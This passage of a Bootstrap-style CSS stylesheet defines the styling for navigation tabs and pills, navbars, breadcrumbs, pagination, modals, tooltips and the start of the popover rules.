	margin-bottom: 0;
}
.nav-list > li > a,
.nav-list .nav-header {
	margin-left: -15px;
	margin-right: -15px;
	text-shadow: 0 1px 0 rgba(255,255,255,0.5);
}
.nav-list > li > a {
	padding: 3px 15px;
}
.nav-list > .active > a,
.nav-list > .active > a:hover,
.nav-list > .active > a:focus {
	color: #fff;
	text-shadow: 0 -1px 0 rgba(0,0,0,0.2);
	background-color: #005e8d;
}
.nav-list [class^="icon-"],
.nav-list [class*=" icon-"] {
	margin-right: 2px;
}
.nav-list .divider {
	*width: 100%;
	height: 1px;
	margin: 8px 1px;
	*margin: -5px 0 5px;
	overflow: hidden;
	background-color: #e5e5e5;
	border-bottom: 1px solid #fff;
}
.nav-tabs,
.nav-pills {
	*zoom: 1;
}
.nav-tabs:before,
.nav-tabs:after,
.nav-pills:before,
.nav-pills:after {
	display: table;
	content: "";
	line-height: 0;
}
.nav-tabs:after,
.nav-pills:after {
	clear: both;
}
.nav-tabs > li,
.nav-pills > li {
	float: left;
}
.nav-tabs > li > a,
.nav-pills > li > a {
	padding-right: 12px;
	padding-left: 12px;
	margin-right: 2px;
	line-height: 14px;
}
.nav-tabs {
	border-bottom: 1px solid #ddd;
}
.nav-tabs > li {
	margin-bottom: -1px;
}
.nav-tabs > li > a {
	padding-top: 8px;
	padding-bottom: 8px;
	line-height: 18px;
	border: 1px solid transparent;
	-webkit-border-radius: 4px 4px 0 0;
	-moz-border-radius: 4px 4px 0 0;
	border-radius: 4px 4px 0 0;
}
.nav-tabs > li > a:hover,
.nav-tabs > li > a:focus {
	border-color: #eee #eee #ddd;
}
.nav-tabs > .active > a,
.nav-tabs > .active > a:hover,
.nav-tabs > .active > a:focus {
	color: #555;
	background-color: #fff;
	border: 1px solid #ddd;
	border-bottom-color: transparent;
	cursor: default;
}
.nav-pills > li > a {
	padding-top: 8px;
	padding-bottom: 8px;
	margin-top: 2px;
	margin-bottom: 2px;
	-webkit-border-radius: 5px;
	-moz-border-radius: 5px;
	border-radius: 5px;
}
.nav-pills > .active > a,
.nav-pills > .active > a:hover,
.nav-pills > .active > a:focus {
	color: #fff;
	background-color: #005e8d;
}
.nav-stacked > li {
	float: none;
}
.nav-stacked > li > a {
	margin-right: 0;
}
.nav-tabs.nav-stacked {
	border-bottom: 0;
}
.nav-tabs.nav-stacked > li > a {
	border: 1px solid #ddd;
	-webkit-border-radius: 0;
	-moz-border-radius: 0;
	border-radius: 0;
}
.nav-tabs.nav-stacked > li:first-child > a {
	-webkit-border-top-right-radius: 4px;
	-moz-border-radius-topright: 4px;
	border-top-right-radius: 4px;
	-webkit-border-top-left-radius: 4px;
	-moz-border-radius-topleft: 4px;
	border-top-left-radius: 4px;
}
.nav-tabs.nav-stacked > li:last-child > a {
	-webkit-border-bottom-right-radius: 4px;
	-moz-border-radius-bottomright: 4px;
	border-bottom-right-radius: 4px;
	-webkit-border-bottom-left-radius: 4px;
	-moz-border-radius-bottomleft: 4px;
	border-bottom-left-radius: 4px;
}
.nav-tabs.nav-stacked > li > a:hover,
.nav-tabs.nav-stacked > li > a:focus {
	border-color: #ddd;
	z-index: 2;
}
.nav-pills.nav-stacked > li > a {
	margin-bottom: 3px;
}
.nav-pills.nav-stacked > li:last-child > a {
	margin-bottom: 1px;
}
.nav-tabs .dropdown-menu {
	-webkit-border-radius: 0 0 6px 6px;
	-moz-border-radius: 0 0 6px 6px;
	border-radius: 0 0 6px 6px;
}
.nav-pills .dropdown-menu {
	-webkit-border-radius: 6px;
	-moz-border-radius: 6px;
	border-radius: 6px;
}
.nav .dropdown-toggle .caret {
	border-top-color: #005e8d;
	border-bottom-color: #005e8d;
	margin-top: 6px;
}
.nav .dropdown-toggle:hover .caret,
.nav .dropdown-toggle:focus .caret {
	border-top-color: #002b41;
	border-bottom-color: #002b41;
}
.nav-tabs .dropdown-toggle .caret {
	margin-top: 8px;
}
.nav .active .dropdown-toggle .caret {
	border-top-color: #fff;
	border-bottom-color: #fff;
}
.nav-tabs .active .dropdown-toggle .caret {
	border-top-color: #555;
	border-bottom-color: #555;
}
.nav > .dropdown.active > a:hover,
.nav > .dropdown.active > a:focus {
	cursor: pointer;
}
.nav-tabs .open .dropdown-toggle,
.nav-pills .open .dropdown-toggle,
.nav > li.dropdown.open.active > a:hover,
.nav > li.dropdown.open.active > a:focus {
	color: #fff;
	background-color: #999;
	border-color: #999;
}
.nav li.dropdown.open .caret,
.nav li.dropdown.open.active .caret,
.nav li.dropdown.open a:hover .caret,
.nav li.dropdown.open a:focus .caret {
	border-top-color: #fff;
	border-bottom-color: #fff;
	opacity: 1;
	filter: alpha(opacity=100);
}
.tabs-stacked .open > a:hover,
.tabs-stacked .open > a:focus {
	border-color: #999;
}
.tabbable {
	*zoom: 1;
}
.tabbable:before,
.tabbable:after {
	display: table;
	content: "";
	line-height: 0;
}
.tabbable:after {
	clear: both;
}
.tab-content {
	overflow: auto;
}
.tabs-below > .nav-tabs,
.tabs-right > .nav-tabs,
.tabs-left > .nav-tabs {
	border-bottom: 0;
}
.tab-content > .tab-pane,
.pill-content > .pill-pane {
	display: none;
}
.tab-content > .active,
.pill-content > .active {
	display: block;
}
.tabs-below > .nav-tabs {
	border-top: 1px solid #ddd;
}
.tabs-below > .nav-tabs > li {
	margin-top: -1px;
	margin-bottom: 0;
}
.tabs-below > .nav-tabs > li > a {
	-webkit-border-radius: 0 0 4px 4px;
	-moz-border-radius: 0 0 4px 4px;
	border-radius: 0 0 4px 4px;
}
.tabs-below > .nav-tabs > li > a:hover,
.tabs-below > .nav-tabs > li > a:focus {
	border-bottom-color: transparent;
	border-top-color: #ddd;
}
.tabs-below > .nav-tabs > .active > a,
.tabs-below > .nav-tabs > .active > a:hover,
.tabs-below > .nav-tabs > .active > a:focus {
	border-color: transparent #ddd #ddd #ddd;
}
.tabs-left > .nav-tabs > li,
.tabs-right > .nav-tabs > li {
	float: none;
}
.tabs-left > .nav-tabs > li > a,
.tabs-right > .nav-tabs > li > a {
	min-width: 74px;
	margin-right: 0;
	margin-bottom: 3px;
}
.tabs-left > .nav-tabs {
	float: left;
	margin-right: 19px;
	border-right: 1px solid #ddd;
}
.tabs-left > .nav-tabs > li > a {
	margin-right: -1px;
	-webkit-border-radius: 4px 0 0 4px;
	-moz-border-radius: 4px 0 0 4px;
	border-radius: 4px 0 0 4px;
}
.tabs-left > .nav-tabs > li > a:hover,
.tabs-left > .nav-tabs > li > a:focus {
	border-color: #eee #ddd #eee #eee;
}
.tabs-left > .nav-tabs .active > a,
.tabs-left > .nav-tabs .active > a:hover,
.tabs-left > .nav-tabs .active > a:focus {
	border-color: #ddd transparent #ddd #ddd;
	*border-right-color: #fff;
}
.tabs-right > .nav-tabs {
	float: right;
	margin-left: 19px;
	border-left: 1px solid #ddd;
}
.tabs-right > .nav-tabs > li > a {
	margin-left: -1px;
	-webkit-border-radius: 0 4px 4px 0;
	-moz-border-radius: 0 4px 4px 0;
	border-radius: 0 4px 4px 0;
}
.tabs-right > .nav-tabs > li > a:hover,
.tabs-right > .nav-tabs > li > a:focus {
	border-color: #eee #eee #eee #ddd;
}
.tabs-right > .nav-tabs .active > a,
.tabs-right > .nav-tabs .active > a:hover,
.tabs-right > .nav-tabs .active > a:focus {
	border-color: #ddd #ddd #ddd transparent;
	*border-left-color: #fff;
}
.nav > .disabled > a {
	color: #999;
}
.nav > .disabled > a:hover,
.nav > .disabled > a:focus {
	text-decoration: none;
	background-color: transparent;
	cursor: default;
}
.navbar {
	overflow: visible;
	margin-bottom: 18px;
	*position: relative;
	*z-index: 2;
}
.navbar-inner {
	min-height: 40px;
	padding-left: 20px;
	padding-right: 20px;
	background-color: #fafafa;
	background-image: -moz-linear-gradient(top,#ffffff,#f2f2f2);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#ffffff),to(#f2f2f2));
	background-image: -webkit-linear-gradient(top,#ffffff,#f2f2f2);
	background-image: -o-linear-gradient(top,#ffffff,#f2f2f2);
	background-image: linear-gradient(to bottom,#ffffff,#f2f2f2);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffffff', endColorstr='#fff2f2f2', GradientType=0);
	border: 1px solid #d4d4d4;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
	-webkit-box-shadow: 0 1px 4px rgba(0,0,0,0.065);
	-moz-box-shadow: 0 1px 4px rgba(0,0,0,0.065);
	box-shadow: 0 1px 4px rgba(0,0,0,0.065);
	*zoom: 1;
}
.navbar-inner:before,
.navbar-inner:after {
	display: table;
	content: "";
	line-height: 0;
}
.navbar-inner:after {
	clear: both;
}
.navbar .container {
	width: auto;
}
.nav-collapse.collapse {
	height: auto;
	overflow: visible;
}
.navbar .brand {
	float: left;
	display: block;
	padding: 11px 20px 11px;
	margin-left: -20px;
	font-size: 20px;
	font-weight: 200;
	color: #555;
	text-shadow: 0 1px 0 #ffffff;
}
.navbar .brand:hover,
.navbar .brand:focus {
	text-decoration: none;
}
.navbar-text {
	margin-bottom: 0;
	line-height: 40px;
	color: #555;
}
.navbar-link {
	color: #555;
}
.navbar-link:hover,
.navbar-link:focus {
	color: #333;
}
.navbar .divider-vertical {
	height: 40px;
	margin: 0 9px;
	border-left: 1px solid #f2f2f2;
	border-right: 1px solid #ffffff;
}
.navbar .btn,
.navbar .btn-group {
	margin-top: 5px;
}
.navbar .btn-group .btn,
.navbar .input-prepend .btn,
.navbar .input-append .btn,
.navbar .input-prepend .btn-group,
.navbar .input-append .btn-group {
	margin-top: 0;
}
.navbar-form {
	margin-bottom: 0;
	*zoom: 1;
}
.navbar-form:before,
.navbar-form:after {
	display: table;
	content: "";
	line-height: 0;
}
.navbar-form:after {
	clear: both;
}
.navbar-form input,
.navbar-form select,
.navbar-form .radio,
.navbar-form .checkbox {
	margin-top: 5px;
}
.navbar-form input,
.navbar-form select,
.navbar-form .btn {
	display: inline-block;
	margin-bottom: 0;
}
.navbar-form input[type="image"],
.navbar-form input[type="checkbox"],
.navbar-form input[type="radio"] {
	margin-top: 3px;
}
.navbar-form .input-append,
.navbar-form .input-prepend {
	margin-top: 5px;
	white-space: nowrap;
}
.navbar-form .input-append input,
.navbar-form .input-prepend input {
	margin-top: 0;
}
.navbar-search {
	position: relative;
	float: left;
	margin-top: 5px;
	margin-bottom: 0;
}
.navbar-search .search-query {
	margin-bottom: 0;
	padding: 4px 14px;
	font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
	font-size: 13px;
	font-weight: normal;
	line-height: 1;
	-webkit-border-radius: 15px;
	-moz-border-radius: 15px;
	border-radius: 15px;
}
.navbar-static-top {
	position: static;
	margin-bottom: 0;
}
.navbar-static-top .navbar-inner {
	-webkit-border-radius: 0;
	-moz-border-radius: 0;
	border-radius: 0;
}
.navbar-fixed-top,
.navbar-fixed-bottom {
	position: fixed;
	right: 0;
	left: 0;
	z-index: 1030;
	margin-bottom: 0;
}
.navbar-fixed-top .navbar-inner,
.navbar-static-top .navbar-inner {
	border-width: 0 0 1px;
}
.navbar-fixed-bottom .navbar-inner {
	border-width: 1px 0 0;
}
.navbar-fixed-top .navbar-inner,
.navbar-fixed-bottom .navbar-inner {
	padding-left: 0;
	padding-right: 0;
	-webkit-border-radius: 0;
	-moz-border-radius: 0;
	border-radius: 0;
}
.navbar-static-top .container,
.navbar-fixed-top .container,
.navbar-fixed-bottom .container {
	width: 940px;
}
.navbar-fixed-top {
	top: 0;
}
.navbar-fixed-top .navbar-inner,
.navbar-static-top .navbar-inner {
	-webkit-box-shadow: 0 1px 10px rgba(0,0,0,.1);
	-moz-box-shadow: 0 1px 10px rgba(0,0,0,.1);
	box-shadow: 0 1px 10px rgba(0,0,0,.1);
}
.navbar-fixed-bottom {
	bottom: 0;
}
.navbar-fixed-bottom .navbar-inner {
	-webkit-box-shadow: 0 -1px 10px rgba(0,0,0,.1);
	-moz-box-shadow: 0 -1px 10px rgba(0,0,0,.1);
	box-shadow: 0 -1px 10px rgba(0,0,0,.1);
}
.navbar .nav {
	position: relative;
	left: 0;
	display: block;
	float: left;
	margin: 0 10px 0 0;
}
.navbar .nav.pull-right {
	float: right;
	margin-right: 0;
}
.navbar .nav > li {
	float: left;
}
.navbar .nav > li > a {
	float: none;
	padding: 11px 15px 11px;
	color: #555;
	text-decoration: none;
	text-shadow: 0 1px 0 #ffffff;
}
.navbar .nav .dropdown-toggle .caret {
	margin-top: 8px;
}
.navbar .nav > li > a:focus,
.navbar .nav > li > a:hover {
	background-color: transparent;
	color: #333;
	text-decoration: none;
}
.navbar .nav > li > a:focus {
	outline: 2px solid #5e9ed6;
}
.navbar .nav > .active > a,
.navbar .nav > .active > a:hover,
.navbar .nav > .active > a:focus {
	color: #555;
	text-decoration: none;
	background-color: #e6e6e6;
	-webkit-box-shadow: inset 0 3px 8px rgba(0,0,0,0.125);
	-moz-box-shadow: inset 0 3px 8px rgba(0,0,0,0.125);
	box-shadow: inset 0 3px 8px rgba(0,0,0,0.125);
}
.navbar .btn-navbar {
	display: none;
	float: right;
	padding: 7px 10px;
	margin-left: 5px;
	margin-right: 5px;
	color: #fff;
	text-shadow: 0 -1px 0 rgba(0,0,0,0.25);
	background-color: #ededed;
	background-image: -moz-linear-gradient(top,#f2f2f2,#e6e6e6);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#f2f2f2),to(#e6e6e6));
	background-image: -webkit-linear-gradient(top,#f2f2f2,#e6e6e6);
	background-image: -o-linear-gradient(top,#f2f2f2,#e6e6e6);
	background-image: linear-gradient(to bottom,#f2f2f2,#e6e6e6);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#fff2f2f2', endColorstr='#ffe5e5e5', GradientType=0);
	border-color: #e6e6e6 #e6e6e6 #bfbfbf;
	*background-color: #e6e6e6;
	filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
	-webkit-box-shadow: inset 0 1px 0 rgba(255,255,255,.1), 0 1px 0 rgba(255,255,255,.075);
	-moz-box-shadow: inset 0 1px 0 rgba(255,255,255,.1), 0 1px 0 rgba(255,255,255,.075);
	box-shadow: inset 0 1px 0 rgba(255,255,255,.1), 0 1px 0 rgba(255,255,255,.075);
}
.navbar .btn-navbar:hover,
.navbar .btn-navbar:focus,
.navbar .btn-navbar:active,
.navbar .btn-navbar.active,
.navbar .btn-navbar.disabled,
.navbar .btn-navbar[disabled] {
	color: #fff;
	background-color: #e6e6e6;
	*background-color: #d9d9d9;
}
.navbar .btn-navbar:active,
.navbar .btn-navbar.active {
	background-color: #cccccc \9;
}
.navbar .btn-navbar .icon-bar {
	display: block;
	width: 18px;
	height: 2px;
	background-color: #f5f5f5;
	-webkit-border-radius: 1px;
	-moz-border-radius: 1px;
	border-radius: 1px;
	-webkit-box-shadow: 0 1px 0 rgba(0,0,0,0.25);
	-moz-box-shadow: 0 1px 0 rgba(0,0,0,0.25);
	box-shadow: 0 1px 0 rgba(0,0,0,0.25);
}
.btn-navbar .icon-bar + .icon-bar {
	margin-top: 3px;
}
.navbar .nav > li > .dropdown-menu:before {
	content: '';
	display: inline-block;
	border-left: 7px solid transparent;
	border-right: 7px solid transparent;
	border-bottom: 7px solid #ccc;
	border-bottom-color: rgba(0,0,0,0.2);
	position: absolute;
	top: -7px;
	left: 9px;
}
.navbar .nav > li > .dropdown-menu:after {
	content: '';
	display: inline-block;
	border-left: 6px solid transparent;
	border-right: 6px solid transparent;
	border-bottom: 6px solid #fff;
	position: absolute;
	top: -6px;
	left: 10px;
}
.navbar-fixed-bottom .nav > li > .dropdown-menu:before {
	border-top: 7px solid #ccc;
	border-top-color: rgba(0,0,0,0.2);
	border-bottom: 0;
	bottom: -7px;
	top: auto;
}
.navbar-fixed-bottom .nav > li > .dropdown-menu:after {
	border-top: 6px solid #fff;
	border-bottom: 0;
	bottom: -6px;
	top: auto;
}
.navbar .nav li.dropdown > a:hover .caret,
.navbar .nav li.dropdown > a:focus .caret {
	border-top-color: #333;
	border-bottom-color: #333;
}
.navbar .nav li.dropdown.open > .dropdown-toggle,
.navbar .nav li.dropdown.active > .dropdown-toggle,
.navbar .nav li.dropdown.open.active > .dropdown-toggle {
	background-color: #e6e6e6;
	color: #555;
}
.navbar .nav li.dropdown > .dropdown-toggle .caret {
	border-top-color: #555;
	border-bottom-color: #555;
}
.navbar .nav li.dropdown.open > .dropdown-toggle .caret,
.navbar .nav li.dropdown.active > .dropdown-toggle .caret,
.navbar .nav li.dropdown.open.active > .dropdown-toggle .caret {
	border-top-color: #555;
	border-bottom-color: #555;
}
.navbar .pull-right > li > .dropdown-menu,
.navbar .nav > li > .dropdown-menu.pull-right {
	left: auto;
	right: 0;
}
.navbar .pull-right > li > .dropdown-menu:before,
.navbar .nav > li > .dropdown-menu.pull-right:before {
	left: auto;
	right: 12px;
}
.navbar .pull-right > li > .dropdown-menu:after,
.navbar .nav > li > .dropdown-menu.pull-right:after {
	left: auto;
	right: 13px;
}
.navbar .pull-right > li > .dropdown-menu .dropdown-menu,
.navbar .nav > li > .dropdown-menu.pull-right .dropdown-menu {
	left: auto;
	right: 100%;
	margin-left: 0;
	margin-right: -1px;
	-webkit-border-radius: 6px 0 6px 6px;
	-moz-border-radius: 6px 0 6px 6px;
	border-radius: 6px 0 6px 6px;
}
.navbar-inverse .navbar-inner {
	background-color: #1b1b1b;
	background-image: -moz-linear-gradient(top,#222222,#111111);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#222222),to(#111111));
	background-image: -webkit-linear-gradient(top,#222222,#111111);
	background-image: -o-linear-gradient(top,#222222,#111111);
	background-image: linear-gradient(to bottom,#222222,#111111);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff222222', endColorstr='#ff111111', GradientType=0);
	border-color: #252525;
}
.navbar-inverse .brand,
.navbar-inverse .nav > li > a {
	color: #999;
	text-shadow: 0 -1px 0 rgba(0,0,0,0.25);
}
.navbar-inverse .brand:hover,
.navbar-inverse .brand:focus,
.navbar-inverse .nav > li > a:hover,
.navbar-inverse .nav > li > a:focus {
	color: #fff;
}
.navbar-inverse .brand {
	color: #999;
}
.navbar-inverse .navbar-text {
	color: #999;
}
.navbar-inverse .nav > li > a:focus,
.navbar-inverse .nav > li > a:hover {
	background-color: transparent;
	color: #fff;
}
.navbar-inverse .nav .active > a,
.navbar-inverse .nav .active > a:hover,
.navbar-inverse .nav .active > a:focus {
	color: #fff;
	background-color: #111111;
}
.navbar-inverse .navbar-link {
	color: #999;
}
.navbar-inverse .navbar-link:hover,
.navbar-inverse .navbar-link:focus {
	color: #fff;
}
.navbar-inverse .divider-vertical {
	border-left-color: #111111;
	border-right-color: #222222;
}
.navbar-inverse .nav li.dropdown.open > .dropdown-toggle,
.navbar-inverse .nav li.dropdown.active > .dropdown-toggle,
.navbar-inverse .nav li.dropdown.open.active > .dropdown-toggle {
	background-color: #111111;
	color: #fff;
}
.navbar-inverse .nav li.dropdown > a:hover .caret,
.navbar-inverse .nav li.dropdown > a:focus .caret {
	border-top-color: #fff;
	border-bottom-color: #fff;
}
.navbar-inverse .nav li.dropdown > .dropdown-toggle .caret {
	border-top-color: #999;
	border-bottom-color: #999;
}
.navbar-inverse .nav li.dropdown.open > .dropdown-toggle .caret,
.navbar-inverse .nav li.dropdown.active > .dropdown-toggle .caret,
.navbar-inverse .nav li.dropdown.open.active > .dropdown-toggle .caret {
	border-top-color: #fff;
	border-bottom-color: #fff;
}
.navbar-inverse .navbar-search .search-query {
	color: #fff;
	background-color: #515151;
	border-color: #111111;
	-webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,.1), 0 1px 0 rgba(255,255,255,.15);
	-moz-box-shadow: inset 0 1px 2px rgba(0,0,0,.1), 0 1px 0 rgba(255,255,255,.15);
	box-shadow: inset 0 1px 2px rgba(0,0,0,.1), 0 1px 0 rgba(255,255,255,.15);
	-webkit-transition: none;
	-moz-transition: none;
	-o-transition: none;
	transition: none;
}
.navbar-inverse .navbar-search .search-query:-moz-placeholder {
	color: #ccc;
}
.navbar-inverse .navbar-search .search-query:-ms-input-placeholder {
	color: #ccc;
}
.navbar-inverse .navbar-search .search-query::-webkit-input-placeholder {
	color: #ccc;
}
.navbar-inverse .navbar-search .search-query:focus,
.navbar-inverse .navbar-search .search-query.focused {
	padding: 5px 15px;
	color: #333;
	text-shadow: 0 1px 0 #fff;
	background-color: #fff;
	border: 0;
	-webkit-box-shadow: 0 0 3px rgba(0,0,0,0.15);
	-moz-box-shadow: 0 0 3px rgba(0,0,0,0.15);
	box-shadow: 0 0 3px rgba(0,0,0,0.15);
	outline: 0;
}
.navbar-inverse .btn-navbar {
	color: #fff;
	text-shadow: 0 -1px 0 rgba(0,0,0,0.25);
	background-color: #0e0e0e;
	background-image: -moz-linear-gradient(top,#151515,#040404);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#151515),to(#040404));
	background-image: -webkit-linear-gradient(top,#151515,#040404);
	background-image: -o-linear-gradient(top,#151515,#040404);
	background-image: linear-gradient(to bottom,#151515,#040404);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff151515', endColorstr='#ff040404', GradientType=0);
	border-color: #040404 #040404 #000000;
	*background-color: #040404;
	filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
}
.navbar-inverse .btn-navbar:hover,
.navbar-inverse .btn-navbar:focus,
.navbar-inverse .btn-navbar:active,
.navbar-inverse .btn-navbar.active,
.navbar-inverse .btn-navbar.disabled,
.navbar-inverse .btn-navbar[disabled] {
	color: #fff;
	background-color: #040404;
	*background-color: #000000;
}
.navbar-inverse .btn-navbar:active,
.navbar-inverse .btn-navbar.active {
	background-color: #000000 \9;
}
.breadcrumb {
	padding: 8px 15px;
	margin: 0 0 18px;
	list-style: none;
	background-color: #f5f5f5;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
}
.breadcrumb > li {
	display: inline-block;
	*display: inline;
	*zoom: 1;
	text-shadow: 0 1px 0 #fff;
}
.breadcrumb > li > .divider {
	padding: 0 5px;
	color: #ccc;
}
.breadcrumb > .active {
	color: #999;
}
.pagination {
	margin: 18px 0;
}
.pagination ul {
	display: inline-block;
	*display: inline;
	*zoom: 1;
	margin-left: 0;
	margin-bottom: 0;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
	-webkit-box-shadow: 0 1px 2px rgba(0,0,0,0.05);
	-moz-box-shadow: 0 1px 2px rgba(0,0,0,0.05);
	box-shadow: 0 1px 2px rgba(0,0,0,0.05);
}
.pagination ul > li {
	display: inline;
}
.pagination ul > li > a,
.pagination ul > li > span {
	float: left;
	padding: 4px 12px;
	line-height: 18px;
	text-decoration: none;
	background-color: #fff;
	border: 1px solid #ddd;
	border-left-width: 0;
}
.pagination ul > li > a:hover,
.pagination ul > li > a:focus,
.pagination ul > .active > a,
.pagination ul > .active > span {
	background-color: #f5f5f5;
}
.pagination ul > .active > a,
.pagination ul > .active > span {
	color: #999;
	cursor: default;
}
.pagination ul > .disabled > span,
.pagination ul > .disabled > a,
.pagination ul > .disabled > a:hover,
.pagination ul > .disabled > a:focus {
	color: #999;
	background-color: transparent;
	cursor: default;
}
.pagination ul > li:first-child > a,
.pagination ul > li:first-child > span {
	border-left-width: 1px;
	-webkit-border-top-left-radius: 4px;
	-moz-border-radius-topleft: 4px;
	border-top-left-radius: 4px;
	-webkit-border-bottom-left-radius: 4px;
	-moz-border-radius-bottomleft: 4px;
	border-bottom-left-radius: 4px;
}
.pagination ul > li:last-child > a,
.pagination ul > li:last-child > span {
	-webkit-border-top-right-radius: 4px;
	-moz-border-radius-topright: 4px;
	border-top-right-radius: 4px;
	-webkit-border-bottom-right-radius: 4px;
	-moz-border-radius-bottomright: 4px;
	border-bottom-right-radius: 4px;
}
.pagination-centered {
	text-align: center;
}
.pagination-right {
	text-align: right;
}
.pagination-large ul > li > a,
.pagination-large ul > li > span {
	padding: 11px 19px;
	font-size: 16.25px;
}
.pagination-large ul > li:first-child > a,
.pagination-large ul > li:first-child > span {
	-webkit-border-top-left-radius: 6px;
	-moz-border-radius-topleft: 6px;
	border-top-left-radius: 6px;
	-webkit-border-bottom-left-radius: 6px;
	-moz-border-radius-bottomleft: 6px;
	border-bottom-left-radius: 6px;
}
.pagination-large ul > li:last-child > a,
.pagination-large ul > li:last-child > span {
	-webkit-border-top-right-radius: 6px;
	-moz-border-radius-topright: 6px;
	border-top-right-radius: 6px;
	-webkit-border-bottom-right-radius: 6px;
	-moz-border-radius-bottomright: 6px;
	border-bottom-right-radius: 6px;
}
.pagination-mini ul > li:first-child > a,
.pagination-mini ul > li:first-child > span,
.pagination-small ul > li:first-child > a,
.pagination-small ul > li:first-child > span {
	-webkit-border-top-left-radius: 3px;
	-moz-border-radius-topleft: 3px;
	border-top-left-radius: 3px;
	-webkit-border-bottom-left-radius: 3px;
	-moz-border-radius-bottomleft: 3px;
	border-bottom-left-radius: 3px;
}
.pagination-mini ul > li:last-child > a,
.pagination-mini ul > li:last-child > span,
.pagination-small ul > li:last-child > a,
.pagination-small ul > li:last-child > span {
	-webkit-border-top-right-radius: 3px;
	-moz-border-radius-topright: 3px;
	border-top-right-radius: 3px;
	-webkit-border-bottom-right-radius: 3px;
	-moz-border-radius-bottomright: 3px;
	border-bottom-right-radius: 3px;
}
.pagination-small ul > li > a,
.pagination-small ul > li > span {
	padding: 2px 10px;
	font-size: 12px;
}
.pagination-mini ul > li > a,
.pagination-mini ul > li > span {
	padding: 0 6px;
	font-size: 9.75px;
}
.pager {
	margin: 18px 0;
	list-style: none;
	text-align: center;
	*zoom: 1;
}
.pager:before,
.pager:after {
	display: table;
	content: "";
	line-height: 0;
}
.pager:after {
	clear: both;
}
.pager li {
	display: inline;
}
.pager li > a,
.pager li > span {
	display: inline-block;
	padding: 5px 14px;
	background-color: #fff;
	border: 1px solid #ddd;
	-webkit-border-radius: 15px;
	-moz-border-radius: 15px;
	border-radius: 15px;
}
.pager li > a:hover,
.pager li > a:focus {
	text-decoration: none;
	background-color: #f5f5f5;
}
.pager .next > a,
.pager .next > span {
	float: right;
}
.pager .previous > a,
.pager .previous > span {
	float: left;
}
.pager .disabled > a,
.pager .disabled > a:hover,
.pager .disabled > a:focus,
.pager .disabled > span {
	color: #999;
	background-color: #fff;
	cursor: default;
}
.modal-backdrop {
	position: fixed;
	top: 0;
	right: 0;
	bottom: 0;
	left: 0;
	z-index: 1040;
	background-color: #000;
}
.modal-backdrop.fade {
	opacity: 0;
}
.modal-backdrop,
.modal-backdrop.fade.in {
	opacity: 0.8;
	filter: alpha(opacity=80);
}
.modal-header {
	padding: 9px 15px;
	border-bottom: 1px solid #eee;
}
.modal-header .close {
	margin-top: 2px;
}
.modal-header h3 {
	margin: 0;
	line-height: 30px;
}
.modal-body {
	width: 98%;
	position: relative;
	max-height: 400px;
	padding: 1%;
}
.modal-body iframe {
	width: 100%;
	max-height: none;
	border: 0 !important;
}
.modal-form {
	margin-bottom: 0;
}
.modal-footer {
	padding: 14px 15px 15px;
	margin-bottom: 0;
	text-align: right;
	background-color: #f5f5f5;
	border-top: 1px solid #ddd;
	-webkit-border-radius: 0 0 6px 6px;
	-moz-border-radius: 0 0 6px 6px;
	border-radius: 0 0 6px 6px;
	-webkit-box-shadow: inset 0 1px 0 #fff;
	-moz-box-shadow: inset 0 1px 0 #fff;
	box-shadow: inset 0 1px 0 #fff;
	*zoom: 1;
}
.modal-footer:before,
.modal-footer:after {
	display: table;
	content: "";
	line-height: 0;
}
.modal-footer:after {
	clear: both;
}
.modal-footer .btn + .btn {
	margin-left: 5px;
	margin-bottom: 0;
}
.modal-footer .btn-group .btn + .btn {
	margin-left: -1px;
}
.modal-footer .btn-block + .btn-block {
	margin-left: 0;
}
.tooltip {
	position: absolute;
	z-index: 1030;
	display: block;
	visibility: visible;
	font-size: 11px;
	line-height: 1.4;
	opacity: 0;
	filter: alpha(opacity=0);
}
.tooltip.in {
	opacity: 0.8;
	filter: alpha(opacity=80);
}
.tooltip.top {
	margin-top: -3px;
	padding: 5px 0;
}
.tooltip.right {
	margin-left: 3px;
	padding: 0 5px;
}
.tooltip.bottom {
	margin-top: 3px;
	padding: 5px 0;
}
.tooltip.left {
	margin-left: -3px;
	padding: 0 5px;
}
.tooltip-inner {
	max-width: 200px;
	padding: 8px;
	color: #fff;
	text-align: center;
	text-decoration: none;
	background-color: #000;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
}
.tooltip-arrow {
	position: absolute;
	width: 0;
	height: 0;
	border-color: transparent;
	border-style: solid;
}
.tooltip.top .tooltip-arrow {
	bottom: 0;
	left: 50%;
	margin-left: -5px;
	border-width: 5px 5px 0;
	border-top-color: #000;
}
.tooltip.right .tooltip-arrow {
	top: 50%;
	left: 0;
	margin-top: -5px;
	border-width: 5px 5px 5px 0;
	border-right-color: #000;
}
.tooltip.left .tooltip-arrow {
	top: 50%;
	right: 0;
	margin-top: -5px;
	border-width: 5px 0 5px 5px;
	border-left-color: #000;
}
.tooltip.bottom .tooltip-arrow {
	top: 0;
	left: 50%;
	margin-left: -5px;
	border-width: 0 5px 5px;
	border-bottom-color: #000;
}
.popover {
	position: absolute;
	top: 0;
	left: 0;
	z-index: 1060;
	display: none;
	max-width: 276px;
	padding: 1px;
	text-align: left;
	background-color: #fff;
	-webkit-background-clip: padding-box;
	-moz-background-clip: padding;
	background-clip: padding-box;
	border: 1px solid #ccc;
	border: 1px solid rgba(0,0,0,0.2);
	-webkit-border-radius: 6px;
	-moz-border-radius: 6px;
	border-radius: 6px;
	-webkit-box-shadow: 0 5px 10px rgba(0,0,0,0.2);
